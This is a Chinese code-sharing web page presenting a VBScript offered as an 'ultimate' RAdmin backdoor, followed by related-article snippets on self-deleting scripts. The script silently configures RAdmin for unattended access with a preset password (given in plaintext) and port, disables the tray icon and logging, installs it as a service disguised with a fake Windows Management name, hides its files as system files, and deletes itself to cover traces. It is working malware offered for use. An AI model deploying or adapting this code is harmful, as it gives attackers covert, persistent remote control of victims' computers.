Vbs脚本实现radmin终极后门代码_删除自身

代码如下:

on error resume next 
const HKEY_LOCAL_MACHINE = &H80000002 
strComputer = "." 
Set StdOut = WScript.StdOut 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_  
strComputer & "\root\default:StdRegProv") 
strKeyPath = "SYSTEM\RAdmin" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv") 
strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) 
uBinary = Array(1,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) 
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)        //此为注册表导出十六进制转为十进制数据 pass:241241241 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)    //Radmin密码 
uBinary = Array(5,4,0,0)      //端口:1029 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) 
uBinary = Array(10,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
strValueName = "LogFilePath" 
strValue = "c:\logfile.txt" 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0) 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") 
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp" 
strValueName = "Description" 
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers." 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
strValueName = "DisplayName" 
strValue = "Windows Management Instrumentation Player Drivers" 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
strValueName = "ImagePath" 
strValue = "c:\windows\system32\Exporer.exe /service" 
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("net start WinManageHelp",0) 
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0) 
c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0) 
d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0) 
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)    //自删除

最好的删除代码不错
createobject("scripting.filesystemobject").deletefile(script.scriptname)

(0)

相关推荐

  • 原来ASP和PHP都是可以删除自身的

    z.asp 复制代码 代码如下: <%  s= Server.MapPath("z.asp")  Set fso = CreateObject("Scripting.FileSystemObject")  If fso.FileExists(s) Then    fso.Deletefile(s)  End If  Set fso = Nothing  %> z.php 复制代码 代码如下: <?php  $file = "z.php&q

  • VBS脚本和BAT批处理删除自身的方法

    VBS脚本和BAT批处理自身删除的方法(自杀) 删除自身之:VBS 把下面的脚本保存为selfkill.vbs或selfkill.vbe: 复制代码 代码如下: Set fso = CreateObject("Scripting.FileSystemObject") f = fso.DeleteFile(WScript.ScriptName) WScript.Echo( WScript.ScriptName) 然后运行它,是不是发现selfkill.vbs神奇的消失啦?而后面的对话框却

  • 批处理删除自身的命令小结

    如果没有移动目录等问题,可以直接通过下面的语句解决: 复制代码 代码如下: del %0 或下面的两种方法都可以 复制代码 代码如下: Del /Q %0 >Nul 复制代码 代码如下: del /f /q %0 上面的代码是没有移动目录的,如果将当前文件的目录改了名字,那么就无法执行,可以通过先执行后删除的方法执行. 复制代码 代码如下: del %0 | move *.* jb51.net 即可.

  • vbs后台运行bat删除自身的代码

    知道真实路径的情况下 复制代码 代码如下: set fso=wscript.createobject("scripting.filesystemobject") fso.deletefile "c:\windows\system32\run.cmd" fso.deletefile "c:\windows\system32\run.vbs" 不知道具体的路径情况下,可以用如下代码: 复制代码 代码如下: Set fso =CreateObject(

  • 批处理程序删除自身 bat批处理

    批处理程序删除自身.bat echo 有时候我们需要批处理程序在执行完成之后删除自身,可以用 del %0 例: 复制代码 代码如下: @echo off echo 按任意键后我将删除自身 pause del %0 不过如果你的批处理需要将当前的批处理改变目录就会出现错误,无法达到我们预知的效果. 例如:当前批处理名为 do.bat 复制代码 代码如下: move *.* d:\ del %0 就无法删除do.bat了.那么就需要结合下管道操作符| 复制代码 代码如下: del %0 | mov

  • ASP和PHP都是可以删除自身的

    z.asp 复制代码 代码如下: <%  s= Server.MapPath("z.asp")  Set fso = CreateObject("Scripting.FileSystemObject")  If fso.FileExists(s) Then    fso.Deletefile(s)  End If  Set fso = Nothing  %> z.php 复制代码 代码如下: <?php  $file = "z.php&q

  • Vbs脚本实现radmin终极后门代码_删除自身

    复制代码 代码如下: on error resume next  const HKEY_LOCAL_MACHINE = &H80000002  strComputer = "."  Set StdOut = WScript.StdOut  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_   strComputer & "\root\defaul

  • vbs脚本和windows定时任务实现qq消息表情包定时发送功能

    vbs脚本和windows定时任务实现qq消息表情包定时发送功能

    目标 在某个时间唤醒电脑屏幕后,自动发送qq信息,并附带表情包,发送完毕后关闭电脑屏幕.整个过程不用过多的程序运行,我们借助vbs脚本和windows定时任务去实现这一功能. 准备 vbs代码qq信息txt文本qq文件表情包文件发送联系人的快捷方式3个windows任务 具体操作 信息和快捷方式准备 qq信息txt文本和表情包文件 桌面新建文本输入要发送的信息,保存为abc.txt, 桌面新建文件,把要放的表情包放进里面,保存为abd qq快捷方式 把联系人拖到桌面生成快捷方式,记住,qq保持登

  • VBS 脚本中的字典、动态数组、队列和堆栈实现代码

    1.编写环境 今天突发奇想下载了个gVim来写VBS脚本,我用的版本是7.4的 在写脚本前,需要在gVim的安装根目录下,找到文件"_vimrc",在里面添加下面三行: set number set softtabstop=4 set tabstop=4 意思分别是"显示行号"."按退格键一次删掉4个空格"和"设定Tab长度为4个字符" 这个设置类似于Linux系统下文件".vimrc"的配置 1.字典:S

  • 使用vbs脚本添加程序到自启动项的代码

    因编辑器过滤了一些字符,比如&,所以下面的脚本可能会运行错误..看官添加&&这个字符就可以了. vbs脚本的功能呢是很多的,不过有时候我们只需要其中的某些功能,今天我突然想研究下怎么用vbs脚本实现添加程序到自启动项...... 首先来一段吧... 复制代码 代码如下: '========================================================================== ' ' VBScript Source File -- Cre

  • 使用vbs脚本实现自动打字祝福与搞笑实现代码

    概述 听说抖音上流行一种用代码做程序表白的东西,,,, 当然我也不是要表白,,,, 但是好像蛮有意思的,,,, 于是,又学了一下vbs脚本,做了几个很不错的祝福脚本,不懂代码的可以直接戳传送门下载,但是想自己改内容的话,下面有讲 效果示范 <iframe height=498 width=510 src='http://player.youku.com/embed/XMzk4Nzk4NDE5Ng==' frameborder=0 'allowfullscreen'> 貌似不能看,只能点进去看,

  • 可以将Bat转换位VBS文件的VBS脚本

    下面代码稍有修改,原结构是脚本与释放的bat同步执行并等待bat执行完毕后删除bat,本意是不遗留临时文件.后来想想通用性不好,比如释放执行的bat文件是个常驻进程的监视类型那VBS也会无休止的等待而无法退出,所以还是改为异步执行,脚本调用bat后自行退出.考虑到还原原文件的完整性末尾添加自删除也打消了想法.压缩包暂未更新. 复制代码 代码如下: 'bat2vbs.vbs by baomaboy Dim WshSHell,FSO On Error Resume Next Set WshSHell

  • Vbs脚本经典教材(最全的资料还是MSDN)

      -为什么要使用Vbs? 在Windows中,学习计算机操作也许很简单,但是很多计算机工作是重复性劳动,例如你每周也许需要对一些计算机文件进行复制.粘贴.改名.删除,也许你每天启动计算机第一件事情就是打开WORD,切换到你喜爱的输入法进行文本编辑,同时还要播放优美的音乐给工作创造一个舒心的环境,当然也有可能你经常需要对文本中的某些数据进行整理,把各式各样的数据按照某种规则排列起来--.这些事情重复.琐碎,使人容易疲劳. 第三方软件也许可以强化计算机的某些功能,但是解决这些重复劳动往往事倍功半,

  • vbs脚本 加密 几个小细节小结下

    复制代码 代码如下: dxy:      你好!      我学vbs也有一小段时间了,最近看到一本书上讲vbs脚本的加密,就自己试了试,可是有一点问题,低级的语法错误我都自己修正了,可脚本运行后不起作用.所以想请教你一下.脚本的原理是这样的:它把代码转换成16进制,然后再写个解密代码,通过这个解密来执行加密的代码,将字符串成16进制的代码如下:  Function str2hex (Byval strHex)  For i=1 to Len(strHex)  sHex = sHex & Hex

  • 使用vbs脚本定时删除N天前的文件

    脚本放在定时任务里代替服务定时执行一些操作比较方便,下面是实现删除文件夹下N天前创建的文件的vbs脚本,在配置文件 DelFolderList.txt 中配置要删除的文件路径,ONLY-DEL-FILES 下的路径 是只删除其下的文件,不删除其内的子目录的文件.DEL-FOLDER-FILES下的路径 是删除其内文件及其子目录内的文件,子目录为空时删除目录,删除的文件list 放在log文件夹内.例配置文件DelFolder.txt 内容如下: ONLY-DEL-FILESE:\Code\tes

  • 利用批处理文件和 vbs 脚本实现网站视频自动录制

    利用批处理文件和 vbs 脚本实现网站视频自动录制 现在电视台基本上都有了自己的门户网站,我们可以充分利用网络的优势来扩大本地电视台的影响.事实上,将本地电视台的每日的王牌节目挂在网站上的做法已经成为建立电视台网站的必要组成步骤之一了.但随之而来的问题是:每天定时需要的手工录制过程,将给管理者带来极大的不便.在 windows 定时任务的基础上,将批处理程序与脚本程序有机的集合,就可以有效地解决这一问题. 1 :建立压码任务 我们将使用一台带有视频采集卡的电脑来完成压码过程.虽然压码不是本文的重

随机推荐